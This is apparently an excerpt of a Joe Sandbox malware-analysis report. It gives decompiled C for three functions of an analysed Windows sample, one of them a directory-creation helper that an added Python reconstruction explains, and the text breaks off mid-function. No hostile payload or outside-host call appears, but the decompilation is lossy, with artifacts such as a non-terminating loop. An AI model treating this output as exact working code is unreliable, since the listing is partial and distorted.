                              0x004087e8
                              0x004087ea
                              0x004087ea
                              0x004087f3
                              0x004087f3
                              0x004087fb
                              0x004087ff
                              0x00408809
                              0x00408814
                              0x00408817
                              0x0040881b
                              0x0040887f
                              0x00408884
                              0x00408886
                              0x00408888
                              0x00408888
                              0x00408888
                              0x0040888a
                              0x00408893
                              0x00408897
                              0x0040889b
                              0x004088a4
                              0x004088a8
                              0x004088b0
                              0x0040881d
                              0x00408826
                              0x0040882f
                              0x00408833
                              0x0040883e
                              0x00408842
                              0x00408846
                              0x0040884a
                              0x00408853
                              0x00408857
                              0x0040885f
                              0x00408867
                              0x0040886f
                              0x00408874
                              0x004088b6
                              0x004088b9
                              0x004088bd
                              0x004088bf
                              0x004088c4
                              0x004088c4
                              0x004088c7
                              0x004087a6
                              0x004087a6
                              0x004087a9
                              0x004087ad
                              0x004087af
                              0x004087b4
                              0x004087b4
                              0x004087b7
                              0x004087b7
                              0x00000000
                              0x004087a4
                              0x00408713
                              0x00408716
                              0x0040871a
                              0x0040871c
                              0x00408721
                              0x00408721
                              0x00000000
                              0x0040871c
                              0x004086cb
                              0x00000000
                              0x004086cb
                              0x004086af
                              0x00000000
                              0x004086af
                              0x00408678
                              0x0040867b
                              0x0040867d
                              0x00408767
                              0x00000000
                              0x00408767
                              0x00000000
                              0x00408724
                              0x00408724
                              0x0040872a
                              0x0040872a
                              0x00000000
                              0x0040866a
                              0x00408642
                              0x00408646
                              0x00408657
                              0x00000000
                              0x00408657
                              0x00408648
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004085fb
                              0x004085fb
                              0x0040860a
                              0x0040860c
                              0x00408631
                              0x0040860e
                              0x0040861a
                              0x0040861d
                              0x00408625
                              0x00408628
                              0x00408628
                              0x00408636
                              0x00408637
                              0x00408637
                              0x00000000
                              0x004085fb
                              0x004085e5
                              0x004085ea
                              0x00000000
                              0x0040857b
                              0x0040857b
                              0x0040857e
                              0x00408582
                              0x0040858a
                              0x00408596
                              0x00408596
                              0x00408599
                              0x00408599
                              0x0040859b
                              0x0040859d
                              0x004085a6
                              0x004085af
                              0x004085b3
                              0x004085bb
                              0x004085bf
                              0x004085c4
                              0x00000000
                              0x0040858c
                              0x0040858d
                              0x00000000
                              0x0040858d
                              0x0040858a
                              0x00408592
                              0x00000000
                              0x00408592

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 83B$Unknown error
                              • API String ID: 3519838083-1944086607
                              • Opcode ID: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
                              • Instruction ID: d43b38567734cbd3d280cef04a8de17ccbe463ec1fdb7709e9180388f705ec22
                              • Opcode Fuzzy Hash: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
                              • Instruction Fuzzy Hash: A5D17070900259EFCF05DFA4C944ADEBB74BF14318F20846EF845BB291CB78AA45CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 79%
                              			E00408F0A(intOrPtr __ecx) {
                              				intOrPtr _t105;
                              				intOrPtr _t113;
                              				void* _t115;
                              				intOrPtr _t118;
                              				long _t123;
                              				intOrPtr* _t131;
                              				void* _t137;
                              				void* _t141;
                              				intOrPtr* _t151;
                              				signed int _t157;
                              				intOrPtr _t192;
                              				intOrPtr* _t196;
                              				long _t198;
                              				void* _t199;
                              
                              				E00413954(E00419BC6, _t199);
                              				_t192 = __ecx;
                              				_t157 = 0;
                              				_push(0x90);
                              				 *((intOrPtr*)(__ecx + 0x28)) = 0;
                              				 *((intOrPtr*)(_t199 - 0x14)) = __ecx;
                              				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
                              				_t105 = E00403A76();
                              				 *((intOrPtr*)(_t199 - 0x18)) = _t105;
                              				 *(_t199 - 4) = 0;
                              				if(_t105 == 0) {
                              					_t196 = 0;
                              					__eflags = 0;
                              				} else {
                              					_t196 = E00409184(_t105);
                              				}
                              				 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
                              				 *((intOrPtr*)(_t199 - 0x10)) = _t196;
                              				if(_t196 != _t157) {
                              					 *((intOrPtr*)( *_t196 + 4))(_t196);
                              				}
                              				 *((intOrPtr*)(_t196 + 0x7c)) =  *((intOrPtr*)(_t199 + 0x1c));
                              				 *(_t199 - 4) = 1;
                              				 *(_t199 - 0x3c) = _t157;
                              				 *(_t199 - 0x38) = _t157;
                              				 *(_t199 - 0x34) = _t157;
                              				E00402170(_t199 - 0x3c, 3);
                              				 *(_t199 - 4) = 2;
                              				 *(_t199 - 0x24) = _t157;
                              				 *(_t199 - 0x20) = _t157;
                              				 *(_t199 - 0x1c) = _t157;
                              				E00402170(_t199 - 0x24, 3);
                              				 *(_t199 - 4) = 3;
                              				 *(_t199 - 0x30) = _t157;
                              				 *(_t199 - 0x2c) = _t157;
                              				 *(_t199 - 0x28) = _t157;
                              				E00402170(_t199 - 0x30, 3);
                              				 *(_t199 - 4) = 4;
                              				if( *((intOrPtr*)(_t199 + 0x14)) != _t157 ||  *((intOrPtr*)(_t199 + 0x10)) != _t157) {
                              					_t58 = _t196 + 8; // 0x8
                              					 *((intOrPtr*)( *((intOrPtr*)(_t196 + 8)) + 0xc))(_t58,  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))));
                              					goto L13;
                              				} else {
                              					_push(_t199 + 0x1c);
                              					if(E00404E76( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))), _t199 - 0x3c) != 0) {
                              						_t137 = E00401E3A(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
                              						 *(_t199 - 4) = 5;
                              						E00401D7A(_t199 - 0x24, _t137);
                              						 *(_t199 - 4) = 4;
                              						E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
                              						_t141 = E00401E19(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
                              						 *(_t199 - 4) = 6;
                              						E00401D7A(_t199 - 0x30, _t141);
                              						 *(_t199 - 4) = 4;
                              						E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
                              						_push(_t199 - 0x30);
                              						_push(_t199 - 0x24);
                              						E004092E9(_t196, __eflags); // executed
                              						L13:
                              						_push( *((intOrPtr*)(_t199 - 0x10)));
                              						_push( *((intOrPtr*)(_t199 + 0x18)));
                              						_t62 = _t199 + 0x14; // 0x414be4
                              						_push( *_t62);
                              						_push( *((intOrPtr*)(_t199 + 0x10)));
                              						_push( *((intOrPtr*)(_t199 + 0xc)));
                              						_push( *((intOrPtr*)(_t199 + 8)));
                              						_t113 = E00408A3B(_t192); // executed
                              						__eflags = _t113 - _t157;
                              						 *((intOrPtr*)(_t199 + 0x18)) = _t113;
                              						if(_t113 == _t157) {
                              							_push(_t199 - 0x30);
                              							_t115 = E00402634(_t199 - 0x48, _t199 - 0x24);
                              							_t193 = _t192 + 0x14;
                              							_push(_t115);
                              							 *(_t199 - 4) = 7;
                              							E00403998(_t192 + 0x14);
                              							 *(_t199 - 4) = 4;
                              							E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
                              							__eflags =  *((intOrPtr*)(_t196 + 0x70)) - _t157;
                              							if( *((intOrPtr*)(_t196 + 0x70)) > _t157) {
                              								do {
                              									_push( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x74)) + _t157 * 4)));
                              									_push(E00402634(_t199 - 0x48, _t199 - 0x24));
                              									 *(_t199 - 4) = 8;
                              									E00403998(_t193);
                              									 *(_t199 - 4) = 4;
                              									E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
                              									_t157 = _t157 + 1;
                              									__eflags = _t157 -  *((intOrPtr*)(_t196 + 0x70));
                              								} while (_t157 <  *((intOrPtr*)(_t196 + 0x70)));
                              							}
                              							_t118 =  *((intOrPtr*)(_t199 - 0x14));
                              							 *((intOrPtr*)(_t118 + 0x28)) =  *((intOrPtr*)(_t196 + 0x88));
                              							 *((intOrPtr*)(_t118 + 0x2c)) =  *((intOrPtr*)(_t196 + 0x8c));
                              							E00403A9C( *(_t199 - 0x30));
                              							E00403A9C( *(_t199 - 0x24));
                              							E00403A9C( *(_t199 - 0x3c));
                              							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
                              							E00403800(_t199 - 0x10);
                              							_t123 = 0;
                              							__eflags = 0;
                              						} else {
                              							E00403A9C( *(_t199 - 0x30));
                              							E00403A9C( *(_t199 - 0x24));
                              							E00403A9C( *(_t199 - 0x3c));
                              							_t131 =  *((intOrPtr*)(_t199 - 0x10));
                              							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
                              							__eflags = _t131 - _t157;
                              							if(_t131 != _t157) {
                              								 *((intOrPtr*)( *_t131 + 8))(_t131);
                              							}
                              							_t123 =  *((intOrPtr*)(_t199 + 0x18));
                              						}
                              					} else {
                              						_t198 = GetLastError();
                              						E00403A9C( *(_t199 - 0x30));
                              						E00403A9C( *(_t199 - 0x24));
                              						E00403A9C( *(_t199 - 0x3c));
                              						_t151 =  *((intOrPtr*)(_t199 - 0x10));
                              						 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
                              						if(_t151 != _t157) {
                              							 *((intOrPtr*)( *_t151 + 8))(_t151);
                              						}
                              						_t123 = _t198;
                              					}
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t199 - 0xc));
                              				return _t123;
                              			}

                              0x00408f0f
                              0x00408f1a
                              0x00408f1c
                              0x00408f1e
                              0x00408f23
                              0x00408f26
                              0x00408f29
                              0x00408f2c
                              0x00408f32
                              0x00408f37
                              0x00408f3a
                              0x00408f47
                              0x00408f47
                              0x00408f3c
                              0x00408f43
                              0x00408f43
                              0x00408f49
                              0x00408f4f
                              0x00408f52
                              0x00408f57
                              0x00408f57
                              0x00408f5f
                              0x00408f65
                              0x00408f6c
                              0x00408f6f
                              0x00408f72
                              0x00408f75
                              0x00408f7f
                              0x00408f83
                              0x00408f86
                              0x00408f89
                              0x00408f8c
                              0x00408f96
                              0x00408f9a
                              0x00408f9d
                              0x00408fa0
                              0x00408fa3
                              0x00408fab
                              0x00408faf
                              0x00409079
                              0x0040907e
                              0x00000000
                              0x00408fbe
                              0x00408fc9
                              0x00408fd1
                              0x00409018
                              0x00409021
                              0x00409025
                              0x0040902d
                              0x00409031
                              0x00409041
                              0x0040904a
                              0x0040904e
                              0x00409056
                              0x0040905a
                              0x00409063
                              0x00409067
                              0x0040906a
                              0x00409081
                              0x00409081
                              0x00409086
                              0x00409089
                              0x00409089
                              0x0040908c
                              0x0040908f
                              0x00409092
                              0x00409095
                              0x0040909a
                              0x0040909c
                              0x0040909f
                              0x004090db
                              0x004090df
                              0x004090e4
                              0x004090e7
                              0x004090ea
                              0x004090ee
                               [instruction address column for the preceding function, 0x00408fd1 .. 0x00409181; the per-line pairing with its C code was lost in extraction]

                              APIs
                              • __EH_prolog.LIBCMT ref: 00408F0F
                              • GetLastError.KERNEL32(?,00000003,00000003,00000003,?,?,00000000), ref: 00408FD3
                                • Part of subcall function 00409184: __EH_prolog.LIBCMT ref: 00409189
                                • Part of subcall function 004092E9: __EH_prolog.LIBCMT ref: 004092EE
                                • Part of subcall function 00408A3B: __EH_prolog.LIBCMT ref: 00408A40
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$ErrorLast
                              • String ID: KA
                              • API String ID: 2901101390-4133974868
                              • Opcode ID: b6f1e9e35d0993485aac3e7f0f886f6fddc444a62bfdbd27778ba704e600b33b
                              • Instruction ID: 1ffdda1e280707f1620b0bff2a1c5a648dc862d45b7bd7d33f28712355ced64d
                              • Opcode Fuzzy Hash: b6f1e9e35d0993485aac3e7f0f886f6fddc444a62bfdbd27778ba704e600b33b
                              • Instruction Fuzzy Hash: 7C81677190020AABCF01EFA5C885ADEBBB5BF18318F14416EF455B32A2CB399A05CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                               Control-flow Graph

                               • Executed
                               • Not Executed
                               [control-flow graph of E004049DD: entry block 0x4049dd-0x404a02 (calls 0x413954 and 0x401c80), GetLastError reached from block 0x404a6d-0x404a78, last block 0x404bd8-0x404bda; the basic-block edge list is omitted here]
                              C-Code - Quality: 98%
                              			E004049DD(void* __ecx) {
                              				signed int _t64;
                              				intOrPtr* _t70;
                              				intOrPtr* _t74;
                              				signed char _t75;
                              				long _t78;
                              				signed int _t80;
                              				signed char _t82;
                              				signed int _t87;
                              				intOrPtr* _t88;
                              				void* _t92;
                              				signed int _t96;
                              				signed int _t98;
                              				signed int _t102;
                              				signed int _t109;
                              				signed int _t116;
                              				intOrPtr _t123;
                              				intOrPtr _t128;
                              				intOrPtr _t129;
                              				intOrPtr _t130;
                              				void* _t132;
                              				signed int _t135;
                              				void* _t138;
                              
                              				E00413954(E004195A0, _t138);
                              				E00401C80(_t138 - 0x18, __ecx);
                              				_t2 = _t138 - 0x14; // 0x414be4
                              				_t109 =  *_t2;
                              				 *(_t138 - 4) =  *(_t138 - 4) & 0x00000000;
                               				_t132 = 0x5c; // L'\\', the path separator the scans below look for
                              				if(_t109 == 0) {
                              					L13:
                              					E00401CE1(_t138 - 0x24, _t138 - 0x18);
                              					_t14 = _t138 - 0x14; // 0x414be4
                              					_t135 =  *_t14;
                              					 *(_t138 - 4) = 1;
                              					while(1) {
                              						L14:
                              						_t64 = E0040499C( *((intOrPtr*)(_t138 - 0x18))); // executed
                              						__eflags = _t64;
                              						if(_t64 != 0) {
                              							break;
                              						}
                               						_t78 = GetLastError();
                               						__eflags = _t78 - 0xb7;
                               						if(_t78 == 0xb7) { // 0xb7 == ERROR_ALREADY_EXISTS (183): an object with this name exists
                              							E00402EE1(_t138 - 0x40);
                              							_push( *((intOrPtr*)(_t138 - 0x18)));
                              							 *(_t138 - 4) = 2;
                              							_t80 = E00405841(_t138 - 0x68, _t128); // executed
                              							__eflags = _t80;
                              							if(_t80 != 0) {
                               								_t82 =  *(_t138 - 0x48) >> 4; // bit 0x10 of the queried attributes == FILE_ATTRIBUTE_DIRECTORY
                               								__eflags = _t82 & 0x00000001;
                               								if((_t82 & 0x00000001) != 0) { // the existing object is a directory: treated as success
                              									 *(_t138 - 4) = 1;
                              									E00403A9C( *((intOrPtr*)(_t138 - 0x40)));
                              									break;
                              								} else {
                              									_t102 = 0;
                              									__eflags = 0;
                              									goto L31;
                              								}
                              							} else {
                              								_t102 = 1;
                              								L31:
                              								E00403A9C( *((intOrPtr*)(_t138 - 0x40)));
                              								E00403A9C( *((intOrPtr*)(_t138 - 0x24)));
                              								E00403A9C( *((intOrPtr*)(_t138 - 0x18)));
                              							}
                              						} else {
                              							_t17 = _t138 - 0x14; // 0x414be4
                              							_t87 =  *_t17;
                              							__eflags = _t87;
                              							if(_t87 == 0) {
                              								L44:
                              								_t102 = 0;
                              								__eflags = 0;
                              								L45:
                              								E00403A9C( *((intOrPtr*)(_t138 - 0x24)));
                              								_t129 =  *((intOrPtr*)(_t138 - 0x18));
                              								goto L46;
                              							} else {
                              								_t123 =  *((intOrPtr*)(_t138 - 0x18));
                              								_t88 = _t123 + _t87 * 2 - 2;
                              								while(1) {
                              									__eflags =  *_t88 - _t132;
                              									if( *_t88 == _t132) {
                              										break;
                              									}
                              									__eflags = _t88 - _t123;
                              									if(_t88 == _t123) {
                              										_t135 = _t135 | 0xffffffff;
                              										__eflags = _t135;
                              									} else {
                               										_t88 = _t88; // decompiler artifact: the scan steps the pointer back one wchar_t here (compare the explicit +2 in the forward scan below); as written the loop could not terminate
                              										continue;
                              									}
                              									L23:
                              									__eflags = _t135;
                              									if(__eflags < 0 || __eflags == 0) {
                              										goto L44;
                              									} else {
                               										__eflags =  *((short*)(_t123 + _t135 * 2 - 2)) - 0x3a; // 0x3a == L':'
                               										if( *((short*)(_t123 + _t135 * 2 - 2)) == 0x3a) { // the backslash follows the drive designator: nothing shorter to try
                              											goto L44;
                              										} else {
                              											_t92 = E00401E3A(_t138 - 0x18, _t138 - 0x30, _t135);
                              											 *(_t138 - 4) = 3;
                              											E00401D7A(_t138 - 0x18, _t92);
                              											 *(_t138 - 4) = 1;
                              											E00403A9C( *((intOrPtr*)(_t138 - 0x30)));
                              											goto L14;
                              										}
                              									}
                              									goto L47;
                              								}
                              								_t135 = _t88 - _t123 >> 1;
                              								goto L23;
                              							}
                              						}
                              						goto L47;
                              					}
                              					E00401D7A(_t138 - 0x18, _t138 - 0x24);
                              					while(1) {
                              						L34:
                              						_t45 = _t138 - 0x14; // 0x414be4
                              						__eflags = _t135 -  *_t45;
                              						if(_t135 >=  *_t45) {
                              							break;
                              						}
                              						_t130 =  *((intOrPtr*)(_t138 - 0x18));
                              						_t70 = _t130 + 2 + _t135 * 2;
                              						while(1) {
                              							_t116 =  *_t70;
                              							__eflags = _t116 - _t132;
                              							if(_t116 == _t132) {
                              								break;
                              							}
                              							__eflags = _t116;
                              							if(_t116 == 0) {
                              								_t135 = _t135 | 0xffffffff;
                              								__eflags = _t135;
                              							} else {
                              								_t70 = _t70 + 2;
                              								continue;
                              							}
                              							L41:
                              							__eflags = _t135;
                              							if(_t135 < 0) {
                              								_t50 = _t138 - 0x14; // 0x414be4
                              								_t135 =  *_t50;
                              							}
                              							_t74 = E00401E3A(_t138 - 0x18, _t138 - 0x30, _t135);
                              							 *(_t138 - 4) = 4;
                              							_t75 = E0040499C( *_t74);
                              							 *(_t138 - 4) = 1;
                              							asm("sbb bl, bl");
                              							E00403A9C( *((intOrPtr*)(_t138 - 0x30)));
                              							__eflags =  ~_t75 + 1;
                              							if( ~_t75 + 1 == 0) {
                              								goto L34;
                              							} else {
                              								goto L44;
                              							}
                              							goto L45;
                              						}
                              						_t135 = _t70 - _t130 >> 1;
                              						goto L41;
                              					}
                              					_t102 = 1;
                              					goto L45;
                              				} else {
                              					_t128 =  *((intOrPtr*)(_t138 - 0x18));
                              					_t96 = _t128 + _t109 * 2 - 2;
                              					while( *_t96 != _t132) {
                              						if(_t96 == _t128) {
                              							_t98 = _t96 | 0xffffffff;
                              							__eflags = _t98;
                              						} else {
                               							_t96 = _t96; // decompiler artifact: the backward scan steps the pointer back one wchar_t here
                              							continue;
                              						}
                              						L7:
                              						__eflags = _t98;
                              						if(_t98 <= 0) {
                              							goto L13;
                              						} else {
                              							__eflags = _t98 - _t109 - 1;
                              							if(_t98 != _t109 - 1) {
                              								goto L13;
                              							} else {
                              								__eflags = _t109 - 3;
                              								if(_t109 != 3) {
                              									L12:
                              									E004023EE(_t138 - 0x18, _t98, 1);
                              									goto L13;
                              								} else {
                               									__eflags =  *((short*)(_t128 + 2)) - 0x3a; // 0x3a == L':'
                               									if( *((short*)(_t128 + 2)) != 0x3a) { // a three-character "X:\" drive root is returned as success
                              										goto L12;
                              									} else {
                              										_t102 = 1;
                              										L46:
                              										E00403A9C(_t129);
                              									}
                              								}
                              							}
                              						}
                              						goto L47;
                              					}
                              					_t98 = _t96 - _t128 >> 1;
                              					goto L7;
                              				}
                              				L47:
                              				 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
                              				return _t102;
                              			}
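                               The routine above creates a directory path component by component: it drops one trailing backslash (a bare drive root such as X:\ is accepted as-is), tries to create the full path, and on any error other than ERROR_ALREADY_EXISTS cuts the path back at the last backslash and retries until some prefix is created or already exists as a directory; it then creates the remaining components forwards and fails if a file is in the way. The Python below is an analyst reconstruction of that control flow as read from the decompilation, added for this report; it is not the sample's code. The fake filesystem, the function names and the ERROR_PATH_NOT_FOUND value it raises are constructed for the example, and treating E0040499C as a CreateDirectoryW wrapper and E00405841 as a file-attribute query is an inference from the error code and attribute bit the function tests.

```python
"""Reconstruction of the directory-creation loop in E004049DD (added example, not the sample's code)."""

ERROR_ALREADY_EXISTS = 0xB7       # GetLastError() value the function compares against (183)
ERROR_PATH_NOT_FOUND = 0x3        # constructed error code used only by the fake filesystem below
FILE_ATTRIBUTE_DIRECTORY = 0x10   # the bit tested by (attrs >> 4) & 1 after the attribute query
FILE_ATTRIBUTE_ARCHIVE = 0x20     # what the fake filesystem reports for a plain file


def _is_drive(p):
    return len(p) == 2 and p[1] == ":"


class FakeFs:
    """Constructed in-memory stand-in for CreateDirectoryW / GetFileAttributesW."""

    def __init__(self, dirs=(), files=()):
        self.dirs = {d.rstrip("\\").lower() for d in dirs}
        self.files = {f.lower() for f in files}
        self.last_error = 0
        self.create_calls = []            # sequence of CreateDirectory attempts, for inspection

    def create_directory(self, path):
        self.create_calls.append(path)
        key = path.rstrip("\\").lower()
        if key in self.dirs or key in self.files:
            self.last_error = ERROR_ALREADY_EXISTS
            return False
        parent = key.rsplit("\\", 1)[0] if "\\" in key else ""
        if parent and parent not in self.dirs and not _is_drive(parent):
            self.last_error = ERROR_PATH_NOT_FOUND
            return False
        self.dirs.add(key)
        return True

    def get_attributes(self, path):
        key = path.rstrip("\\").lower()
        if key in self.dirs:
            return FILE_ATTRIBUTE_DIRECTORY
        if key in self.files:
            return FILE_ATTRIBUTE_ARCHIVE
        return None                       # query failed


def ensure_directory(fs, path):
    """Mirror of E004049DD: True when `path` ends up existing as a directory."""
    # Prologue: drop one trailing backslash, but a bare drive root "X:\" is accepted as-is.
    if path.endswith("\\"):
        if len(path) == 3 and path[1] == ":":
            return True
        path = path[:-1]
    full = path
    cut = len(path)

    # Phase 1: cut the path back at the last backslash until a prefix can be created
    # or is found to exist already as a directory.
    while not fs.create_directory(path):
        if fs.last_error == ERROR_ALREADY_EXISTS:
            attrs = fs.get_attributes(path)
            if attrs is None:
                return True               # the decompilation returns 1 when the query fails
            if attrs & FILE_ATTRIBUTE_DIRECTORY:
                break                     # an existing directory counts as success
            return False                  # a file with that name is in the way
        idx = path.rfind("\\")
        if idx <= 0 or path[idx - 1] == ":":
            return False                  # reached the drive designator without success
        path = path[:idx]
        cut = idx

    # Phase 2: create the remaining components forwards, one backslash at a time.
    while cut < len(full):
        nxt = full.find("\\", cut + 1)
        cut = len(full) if nxt < 0 else nxt
        if not fs.create_directory(full[:cut]):
            return False
    return True
```

                               Running ensure_directory against the fake filesystem records the back-then-forward sequence of CreateDirectory attempts (full path, then ever-shorter prefixes, then each missing component in order), which is the call pattern to expect in a Procmon or sandbox API trace whenever this helper prepares a directory.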

                               [instruction address column for E004049DD, 0x004049e2 .. 0x00404bd7 (0x00000000 marks lines without a machine address); the per-line pairing with the C code above was lost in extraction]

                              APIs
                              • __EH_prolog.LIBCMT ref: 004049E2
                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00404A6D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: ErrorH_prologLast
                              • String ID: KA
                              • API String ID: 1057991267-4133974868
                              • Opcode ID: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
                              • Instruction ID: ea88e0dbf276ed2b61ac96949af9a946984d9cda694903235269fb2a0f105987
                              • Opcode Fuzzy Hash: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
                              • Instruction Fuzzy Hash: 14512671A4010A9ACF10EBA0C945AFFBB74EF91318F14017BE601732D1D779AE46CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                               Control-flow Graph

                               • Executed
                               • Not Executed
                               [control-flow graph of E00401AF4: entry block 0x401af4-0x401b2e (calls 0x413954, 0x413cc0 and 0x405b6d), read loop around block 0x401b7f-0x401b96 (call 0x405bca), last block 0x401c6b-0x401c78; the basic-block edge list is omitted here]
                              C-Code - Quality: 93%
                              			E00401AF4(void* __ecx, intOrPtr __edx, void* __eflags) {
                              				signed char** _t64;
                              				char* _t67;
                              				void* _t71;
                              				signed int _t73;
                              				intOrPtr _t74;
                              				void* _t75;
                              				void* _t81;
                              				void* _t83;
                              				char _t84;
                              				signed int _t89;
                              				signed int _t91;
                              				void* _t92;
                              				signed int _t103;
                              				void* _t107;
                              				void* _t109;
                              				void* _t110;
                              				void* _t112;
                              
                              				_t92 = __ecx;
                              				E00413954(E004190C8, _t110);
                               				E00413CC0(0x1024, __ecx); // stack probe for the 0x1000-byte read buffer at ebp-0x1030 (likely _chkstk)
                              				_t64 =  *(_t110 + 0xc);
                              				_t103 = 0;
                              				_t64[1] = 0;
                              				 *((intOrPtr*)(_t110 - 0x30)) = __edx;
                              				 *( *_t64) =  *( *_t64) & 0x00000000;
                              				 *(_t110 - 0x1c) =  *(_t110 - 0x1c) | 0xffffffff;
                              				 *(_t110 - 4) = 0;
                              				if(E00405B6D(_t92) != 0) {
                              					 *((intOrPtr*)(_t110 - 0x14)) = 0;
                              					if( *((char*)(__edx)) != 0) {
                              						do {
                              							 *((intOrPtr*)(_t110 - 0x14)) =  *((intOrPtr*)(_t110 - 0x14)) + 1;
                              						} while ( *((char*)( *((intOrPtr*)(_t110 - 0x14)) + __edx)) != 0);
                              					}
                              					_t67 =  *((intOrPtr*)(_t110 + 8));
                              					 *((intOrPtr*)(_t110 - 0x18)) = _t103;
                              					if( *_t67 != 0) {
                              						do {
                              							 *((intOrPtr*)(_t110 - 0x18)) =  *((intOrPtr*)(_t110 - 0x18)) + 1;
                              						} while ( *((char*)( *((intOrPtr*)(_t110 - 0x18)) + _t67)) != 0);
                              					}
                              					_t107 = 0;
                              					 *(_t110 - 0xd) =  *(_t110 - 0xd) & 0x00000000;
                              					 *((intOrPtr*)(_t110 - 0x24)) = _t103;
                              					 *((intOrPtr*)(_t110 - 0x20)) = _t103;
                              					while(1) {
                              						L8:
                               						_t71 = E00405BCA(_t110 - 0x1c, _t110 + _t107 - 0x1030, 0x1000 - _t107, _t110 - 0x28); // executed; reads up to (0x1000 - tail) bytes in after the carried-over tail, byte count returned in ebp-0x28
                              						if(_t71 == 0) {
                              							break;
                              						}
                              						_t74 =  *((intOrPtr*)(_t110 - 0x28));
                              						if(_t74 == _t103) {
                              							L23:
                              							_t89 = 1;
                              						} else {
                              							_t109 = _t107 + _t74;
                              							_t91 = _t110 - 0x1030;
                              							while(1) {
                              								_t75 = _t109;
                              								if( *(_t110 - 0xd) != 0) {
                              								}
                              								L12:
                              								if(_t103 > _t75 -  *((intOrPtr*)(_t110 - 0x18))) {
                              									L20:
                               									_t107 = _t109 - _t103; // length of the unconsumed tail (too short to hold the needle)
                               									 *((intOrPtr*)(_t110 - 0x24)) =  *((intOrPtr*)(_t110 - 0x24)) + _t103;
                               									asm("adc dword [ebp-0x20], 0x0"); // 64-bit running byte count in ebp-0x24:ebp-0x20
                               									E00413980(_t110 - 0x1030, _t110 + _t103 - 0x1030, _t107); // move the tail to the start of the buffer for the next read
                               									_t112 = _t112 + 0xc;
                               									if( *((intOrPtr*)(_t110 - 0x20)) > 0 ||  *((intOrPtr*)(_t110 - 0x24)) > 0x100000) { // stop after 1 MiB (0x100000 bytes)
                              										_t89 = _t91 & 0xffffff00 | ( *(_t110 + 0xc))[1] == 0x00000000;
                              									} else {
                              										_t103 = 0;
                              										goto L8;
                              									}
                              								} else {
                              									_t83 = E004134D0(_t91,  *((intOrPtr*)(_t110 + 8)),  *((intOrPtr*)(_t110 - 0x18)));
                              									_t112 = _t112 + 0xc;
                              									if(_t83 == 0) {
                              										goto L23;
                              									} else {
                              										_t84 =  *_t91;
                              										 *((char*)(_t110 - 0x2c)) = _t84;
                              										if(_t84 == 0) {
                              											goto L24;
                              										} else {
